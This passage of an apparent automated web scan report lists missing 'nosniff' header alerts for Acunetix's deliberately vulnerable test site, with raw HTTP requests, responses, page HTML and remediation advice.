          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        4. GET http://testaspnet.vulnweb.com/ads/acunetix.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (333 bytes)
          GET http://testaspnet.vulnweb.com/ads/acunetix.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ads/def.html
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:52 GMT
          Accept-Ranges: bytes
          ETag: "eb3686f99c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 3048
          
          
          Response body (3048 bytes)
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        5. GET http://testaspnet.vulnweb.com/ads/def.html
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (355 bytes)
          GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (246 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/html
          Last-Modified: Fri, 24 May 2019 07:50:37 GMT
          Accept-Ranges: bytes
          ETag: "eb6cf45f512d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 488
          
          
          Response body (488 bytes)
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
          <html>
          	<head>
          		<title></title>
          		<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
          		<meta name="ProgId" content="VisualStudio.HTML">
          		<meta name="Originator" content="Microsoft Visual Studio .NET 7.1">
          	</head>
          	<body>
          		<P align="center"><STRONG>Is your website hackable?<BR>
          				check with<BR>
          				<IMG src="acunetix.gif"><BR>
          				Web Vulnerability Scanner</STRONG></P>
          	</body>
          </html>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        6. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 13707
          
          
          Response body (13707 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a>
          						<DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV>
          						<div id="divComments">User comments:
          							<table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0">
          </table>
          
          						</div>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea>
          									<input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        7. GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (322 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 14245
          
          
          Response body (14245 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
